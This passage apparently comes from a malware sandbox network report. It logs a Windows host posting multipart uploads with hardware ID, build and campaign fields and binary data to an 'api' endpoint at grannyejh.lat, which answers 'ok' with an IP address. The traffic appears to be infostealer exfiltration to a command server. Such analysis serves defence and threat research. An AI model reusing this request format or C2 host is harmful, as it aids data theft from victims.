                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 34 34 62 35 0d 0a 6d 62 74 4e 4b 41 75 63 43 46 32 73 58 58 34 52 61 58 42 7a 50 78 31 6e 5a 6b 66 61 58 74 77 42 64 64 51 6a 6a 75 54 48 79 68 50 70 54 33 55 67 49 37 78 78 66 64 31 46 55 79 6c 4e 57 57 70 65 43 46 70 6a 65 2b 59 2f 32 58 42 42 56 42 2f 6d 68 4d 37 4f 39 39 56 58 65 51 78 71 67 43 78 6c 74 47 55 48 49 48 51 67 63 6d 59 70 64 32 70 6e 33 6c 72 55 45 57 6e 38 47 35 4c 30 77 38 59 58 33 55 4e 68 43 41 65 73 62 57 48 4e 52 52 63 68 59 58 56 2f 58 79 52 62 52 68 72 37 50 39 69 46 65 63 68 6a 2f 39 77 33 79 68 76 68 63 78 67 51 54 72 67 30 58 63 31 55 47 6e 42 31 61 57 35 43 44 57 39 79 64 2b 70 4f 37 43 31 6c 34 41 50 79 2f 4e 50 2b 61 2b 31 48 56 53 67 44 6c 47 31 64 31 57 45 6a 4f 56 68 41 53 31 34 42 4f 6c 73 61 2b 75 4c 73 55 51 6e 73 43
                                                                                                                                                                                                                                                          Data Ascii: 44b5mbtNKAucCF2sXX4RaXBzPx1nZkfaXtwBddQjjuTHyhPpT3UgI7xxfd1FUylNWWpeCFpje+Y/2XBBVB/mhM7O99VXeQxqgCxltGUHIHQgcmYpd2pn3lrUEWn8G5L0w8YX3UNhCAesbWHNRRchYXV/XyRbRhr7P9iFechj/9w3yhvhcxgQTrg0Xc1UGnB1aW5CDW9yd+pO7C1l4APy/NP+a+1HVSgDlG1d1WEjOVhAS14BOlsa+uLsUQnsC
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 47 50 37 68 75 49 42 43 50 6a 41 6c 30 30 52 67 6a 64 48 56 64 51 31 39 38 57 33 4a 4c 36 6c 4c 6f 4e 58 48 77 49 36 72 49 31 39 59 6a 77 58 64 56 46 42 2b 67 59 57 48 35 56 51 73 68 55 56 6c 43 55 68 46 43 57 30 4c 36 51 72 6b 51 49 4d 53 6a 6a 76 6a 54 78 69 2b 64 63 6b 41 70 4d 37 68 4a 58 4e 41 46 51 31 45 70 58 51 39 6d 65 46 74 47 53 76 73 2f 32 44 6b 4a 30 42 2b 71 2f 50 66 57 45 2f 46 76 56 56 67 54 6d 45 31 74 38 58 45 6e 43 57 46 31 62 6e 49 52 45 78 4a 33 36 6d 62 70 45 48 6a 45 4f 39 76 56 67 73 61 33 68 57 4d 42 43 44 36 41 4c 47 57 30 5a 51 63 67 64 43 42 79 58 69 56 72 64 6d 66 57 63 73 67 42 51 66 41 4c 67 75 7a 48 39 67 50 70 63 77 6b 6b 4a 36 42 35 65 63 56 56 4c 78 30 39 54 58 64 66 4a 46 74 47 47 76 73 2f 32 49 32 4e 47 4b 71 36 71 64
                                                                                                                                                                                                                                                          Data Ascii: GP7huIBCPjAl00RgjdHVdQ198W3JL6lLoNXHwI6rI19YjwXdVFB+gYWH5VQshUVlCUhFCW0L6QrkQIMSjjvjTxi+dckApM7hJXNAFQ1EpXQ9meFtGSvs/2DkJ0B+q/PfWE/FvVVgTmE1t8XEnCWF1bnIRExJ36mbpEHjEO9vVgsa3hWMBCD6ALGW0ZQcgdCByXiVrdmfWcsgBQfALguzH9gPpcwkkJ6B5ecVVLx09TXdfJFtGGvs/2I2NGKq6qd
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 44 6b 42 78 4d 7a 42 64 59 66 78 6c 5a 69 6b 51 51 57 35 76 48 44 70 61 5a 39 70 2b 34 42 31 5a 36 42 65 4b 30 4d 66 65 4e 2f 6c 7a 66 51 77 58 6e 46 46 46 6d 58 6b 76 4e 58 56 74 56 6e 59 4e 58 33 64 36 77 31 37 45 63 45 43 6c 4a 33 4c 49 75 34 59 75 32 52 4a 35 64 54 4f 63 59 46 79 77 5a 53 39 5a 63 56 55 36 54 69 46 33 45 6c 66 69 58 73 78 5a 58 66 51 50 68 74 6a 44 38 69 2f 35 4a 30 45 6b 4d 38 67 5a 52 66 31 63 47 69 68 31 58 52 4e 66 66 46 75 65 4a 39 64 65 70 53 6b 6b 78 44 75 4c 31 59 4c 47 4c 2f 46 62 65 56 67 6a 6d 48 31 52 36 55 55 50 4d 57 56 70 52 6d 49 78 63 33 35 62 2b 6d 4c 4d 4d 57 33 63 48 37 37 4d 30 2f 4d 69 34 47 39 64 63 54 4c 68 55 63 47 35 55 51 4e 4e 4d 5a 56 75 58 31 68 62 4a 30 4f 66 58 73 51 67 51 4b 55 6e 6a 75 54 4c 38 6a 66
                                                                                                                                                                                                                                                          Data Ascii: DkBxMzBdYfxlZikQQW5vHDpaZ9p+4B1Z6BeK0MfeN/lzfQwXnFFFmXkvNXVtVnYNX3d6w17EcEClJ3LIu4Yu2RJ5dTOcYFywZS9ZcVU6TiF3ElfiXsxZXfQPhtjD8i/5J0EkM8gZRf1cGih1XRNffFueJ9depSkkxDuL1YLGL/FbeVgjmH1R6UUPMWVpRmIxc35b+mLMMW3cH77M0/Mi4G9dcTLhUcG5UQNNMZVuX1hbJ0OfXsQgQKUnjuTL8jf
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 45 36 34 4e 46 33 4e 56 42 70 77 64 58 6c 47 52 68 6c 66 65 6c 76 36 52 76 41 42 54 65 41 72 70 76 44 37 36 69 2f 78 55 31 30 49 49 34 42 39 51 65 6c 39 44 7a 31 51 51 45 74 65 41 54 70 62 47 76 72 47 56 46 6b 4a 44 42 2b 32 75 65 4f 37 47 37 78 76 58 53 45 79 34 56 46 78 38 56 6c 54 42 56 46 68 59 6e 6f 64 53 33 4a 50 35 6c 37 4d 4a 56 58 55 48 36 72 49 34 2f 59 66 78 55 39 39 41 44 4f 39 55 47 54 52 65 58 6f 51 46 45 48 79 63 6b 58 66 59 6c 65 7a 58 71 55 70 4a 4d 51 37 69 39 57 43 78 68 76 39 61 32 45 6f 41 36 42 42 46 64 46 4a 50 79 31 78 66 58 4a 53 47 58 4e 36 4d 2b 4a 65 39 44 46 64 35 44 65 43 6e 4f 66 37 49 75 42 76 58 58 45 79 34 56 47 5a 69 58 6b 48 4c 48 33 6c 62 6a 49 5a 63 31 5a 58 79 31 36 6c 4b 53 54 45 4f 34 76 56 67 73 59 58 36 56 74 52
                                                                                                                                                                                                                                                          Data Ascii: E64NF3NVBpwdXlGRhlfelv6RvABTeArpvD76i/xU10II4B9Qel9Dz1QQEteATpbGvrGVFkJDB+2ueO7G7xvXSEy4VFx8VlTBVFhYnodS3JP5l7MJVXUH6rI4/YfxU99ADO9UGTReXoQFEHyckXfYlezXqUpJMQ7i9WCxhv9a2EoA6BBFdFJPy1xfXJSGXN6M+Je9DFd5DeCnOf7IuBvXXEy4VGZiXkHLH3lbjIZc1ZXy16lKSTEO4vVgsYX6VtR
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 31 73 30 41 51 62 50 55 31 56 64 6d 34 31 52 32 49 7a 2f 6e 62 6f 46 56 33 59 43 2f 4c 34 71 2b 6f 44 31 56 64 68 4e 44 4f 34 55 56 6e 6c 5a 42 6f 6f 64 56 30 54 58 33 78 62 7a 76 65 6d 42 76 45 5a 7a 5a 68 2f 6b 73 6a 54 6e 67 2f 64 59 78 6b 6b 63 6f 46 6f 58 5a 56 35 58 68 41 56 47 54 49 43 41 53 5a 69 48 76 70 43 36 52 41 67 78 41 75 47 37 4e 66 71 4d 2f 31 37 59 52 77 6e 6c 48 6c 74 34 57 45 37 4e 56 31 56 5a 6b 59 31 56 32 4a 48 2f 6d 37 49 4e 58 6e 68 4a 6f 50 55 2f 36 63 69 75 47 2b 5a 55 43 2f 67 5a 52 7a 5a 72 52 64 56 4d 52 56 47 48 67 52 54 35 6e 66 4b 55 73 77 4e 41 4d 52 61 67 72 48 6a 32 68 4c 59 44 6b 45 51 49 37 42 64 51 65 6c 5a 4c 79 31 70 62 55 35 32 4a 52 4e 6d 62 39 70 75 2b 43 55 4a 37 41 2f 79 38 4d 66 79 47 2f 6b 6e 54 42 45 4b 67
                                                                                                                                                                                                                                                          Data Ascii: 1s0AQbPU1Vdm41R2Iz/nboFV3YC/L4q+oD1VdhNDO4UVnlZBoodV0TX3xbzvemBvEZzZh/ksjTng/dYxkkcoFoXZV5XhAVGTICASZiHvpC6RAgxAuG7NfqM/17YRwnlHlt4WE7NV1VZkY1V2JH/m7INXnhJoPU/6ciuG+ZUC/gZRzZrRdVMRVGHgRT5nfKUswNAMRagrHj2hLYDkEQI7BdQelZLy1pbU52JRNmb9pu+CUJ7A/y8MfyG/knTBEKg
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 52 48 78 31 4d 53 62 59 47 4b 52 74 57 62 2b 61 6d 49 43 6c 64 6c 44 75 43 7a 4f 4c 48 47 74 6c 53 51 48 44 57 67 58 42 64 4c 46 77 62 63 48 51 67 63 6f 6f 52 59 32 4a 6e 6f 68 76 73 6e 52 32 63 44 39 66 63 65 39 70 6e 2f 54 64 31 57 54 4b 35 55 55 54 51 42 46 6f 6f 64 56 45 33 58 33 77 61 45 78 61 76 45 34 56 51 43 62 6b 66 33 39 53 36 78 30 4b 51 56 6b 46 5a 4d 75 46 51 51 64 30 74 55 77 6c 35 47 58 39 43 35 61 50 61 56 36 4a 61 37 44 31 78 50 4e 2f 75 32 4e 76 2b 50 34 45 71 51 43 6b 7a 76 56 41 39 4e 47 51 36 45 59 68 34 63 6a 38 63 4f 6c 71 76 39 6d 62 67 44 52 6d 42 45 7a 72 34 75 38 49 58 39 56 35 4a 46 41 66 41 54 46 7a 6f 5a 51 49 51 46 41 42 4c 58 67 30 65 57 78 71 37 46 37 56 45 44 4a 6c 6d 38 71 6e 62 6f 79 4f 41 62 69 42 5a 43 6f 41 59 58 4c
                                                                                                                                                                                                                                                          Data Ascii: RHx1MSbYGKRtWb+amICldlDuCzOLHGtlSQHDWgXBdLFwbcHQgcooRY2JnohvsnR2cD9fce9pn/Td1WTK5UUTQBFoodVE3X3waExavE4VQCbkf39S6x0KQVkFZMuFQQd0tUwl5GX9C5aPaV6Ja7D1xPN/u2Nv+P4EqQCkzvVA9NGQ6EYh4cj8cOlqv9mbgDRmBEzr4u8IX9V5JFAfATFzoZQIQFABLXg0eWxq7F7VEDJlm8qnboyOAbiBZCoAYXL
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1369INData Raw: 4d 48 57 6d 55 6c 6c 58 57 6c 62 37 5a 39 67 49 51 4b 56 75 67 39 54 7a 67 79 4b 34 4c 67 68 39 5a 73 30 4d 48 4a 6b 59 49 33 52 31 47 48 4d 2f 56 47 4a 61 4d 76 73 2f 32 51 31 4e 6a 47 2b 69 32 4c 76 4c 50 79 47 58 32 52 77 76 6d 46 31 6c 6a 53 41 54 72 58 6c 74 51 6d 34 42 41 36 4b 44 72 6c 4c 67 4b 56 32 63 59 72 76 74 34 2f 73 69 75 59 70 42 56 42 75 64 59 48 7a 68 49 56 63 70 57 52 6c 76 58 75 42 69 57 68 72 37 50 39 6a 46 54 66 77 66 70 6f 79 6d 38 72 76 56 63 31 6b 63 43 39 77 55 58 4f 68 6c 41 68 41 55 43 45 74 65 44 52 35 62 47 72 73 58 74 55 51 4d 6d 57 62 79 71 64 75 6a 49 34 42 75 49 46 30 4b 67 42 68 63 73 47 51 48 4b 55 46 46 66 6d 59 52 45 78 4a 6a 39 67 62 56 44 62 6b 38 73 34 37 67 39 2f 34 2f 49 5a 66 46 4f 48 4f 30 62 55 45 70 6e 63 64
                                                                                                                                                                                                                                                          Data Ascii: MHWmUllXWlb7Z9gIQKVug9TzgyK4Lgh9Zs0MHJkYI3R1GHM/VGJaMvs/2Q1NjG+i2LvLPyGX2RwvmF1ljSATrXltQm4BA6KDrlLgKV2cYrvt4/siuYpBVBudYHzhIVcpWRlvXuBiWhr7P9jFTfwfpoym8rvVc1kcC9wUXOhlAhAUCEteDR5bGrsXtUQMmWbyqdujI4BuIF0KgBhcsGQHKUFFfmYRExJj9gbVDbk8s47g9/4/IZfFOHO0bUEpncd


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          52192.168.2.450267172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:23 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=RS3LXXHEF2KLCWF
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18145
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:23 UTC15331OUTData Raw: 2d 2d 52 53 33 4c 58 58 48 45 46 32 4b 4c 43 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 53 33 4c 58 58 48 45 46 32 4b 4c 43 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 53 33 4c 58 58 48 45 46 32 4b 4c 43 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 53 33 4c 58
                                                                                                                                                                                                                                                          Data Ascii: --RS3LXXHEF2KLCWFContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--RS3LXXHEF2KLCWFContent-Disposition: form-data; name="pid"2--RS3LXXHEF2KLCWFContent-Disposition: form-data; name="lid"PsFKDg--pablo--RS3LX
                                                                                                                                                                                                                                                          2024-12-19 13:27:23 UTC2814OUTData Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11
                                                                                                                                                                                                                                                          Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                          2024-12-19 13:27:24 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3f4b0949hupltkunujios0gp9k; expires=Mon, 14 Apr 2025 07:14:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pRk0TqNenuCROVo1Kxh%2F1%2FkRyskdqPzyDaT0eAJAb2cvtKuNrTXpfdzexz%2BjpHH4iV1ZZI0pG1pkPVcaIG%2FEX%2FCQUnPK%2B50HAhS5upnPLDbFOc%2F2tlrgFFsy%2B3zAu8YQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bad5e8615e72-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2248&min_rtt=2234&rtt_var=866&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=19101&delivery_rate=1242553&cwnd=193&unsent_bytes=0&cid=31c4c5a3c044b186&ts=970&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          53192.168.2.450269172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:25 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=VJDTWO6W6RFJFG43
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8772
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:25 UTC8772OUTData Raw: 2d 2d 56 4a 44 54 57 4f 36 57 36 52 46 4a 46 47 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 4a 44 54 57 4f 36 57 36 52 46 4a 46 47 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4a 44 54 57 4f 36 57 36 52 46 4a 46 47 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 4a
                                                                                                                                                                                                                                                          Data Ascii: --VJDTWO6W6RFJFG43Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--VJDTWO6W6RFJFG43Content-Disposition: form-data; name="pid"2--VJDTWO6W6RFJFG43Content-Disposition: form-data; name="lid"PsFKDg--pablo--VJ
                                                                                                                                                                                                                                                          2024-12-19 13:27:26 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:26 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=o984d2qrkdso11q2tgs53a7kkj; expires=Mon, 14 Apr 2025 07:14:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BiUg5cFmGEzp35iez9HFll3XdivplLWJ09UOeu8YS3DtoKM6aDSVjdX%2Fxz58YdMjUrduwLp6Y6Ullj%2BFSMShIeApBlfLQuZnzdjLLiDtuCjN1BR6Zgc9hRPVB9WCXO19"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bae3fbc9436c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1699&rtt_var=645&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9706&delivery_rate=1684939&cwnd=228&unsent_bytes=0&cid=17a96ca72539ac6d&ts=830&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          54192.168.2.450271172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:27 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=SGSER36Z
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20377
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:27 UTC15331OUTData Raw: 2d 2d 53 47 53 45 52 33 36 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 47 53 45 52 33 36 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 47 53 45 52 33 36 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 53 47 53 45 52 33 36 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                          Data Ascii: --SGSER36ZContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--SGSER36ZContent-Disposition: form-data; name="pid"3--SGSER36ZContent-Disposition: form-data; name="lid"PsFKDg--pablo--SGSER36ZContent-Disposit
                                                                                                                                                                                                                                                          2024-12-19 13:27:27 UTC5046OUTData Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00
                                                                                                                                                                                                                                                          Data Ascii: QMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                                          2024-12-19 13:27:28 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=b6k4ugrtlbi51jbuairflsu0m9; expires=Mon, 14 Apr 2025 07:14:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2Z1CBALoUkkYFUihMglByfVtI78XE32YwYGO8JJXL%2FQWa%2BUBiP%2FgY0G%2FXal2gGshH%2BbiLV2SUeUI2ZZxCk%2ByaaLrFGIR9JE8wByOw1uwb89A1WWyO97k1kfcQILUKEZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47baf0c98a4381-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2484&min_rtt=2481&rtt_var=937&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21326&delivery_rate=1164738&cwnd=211&unsent_bytes=0&cid=59260b241fe25d36&ts=977&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          55192.168.2.450273172.67.179.109443
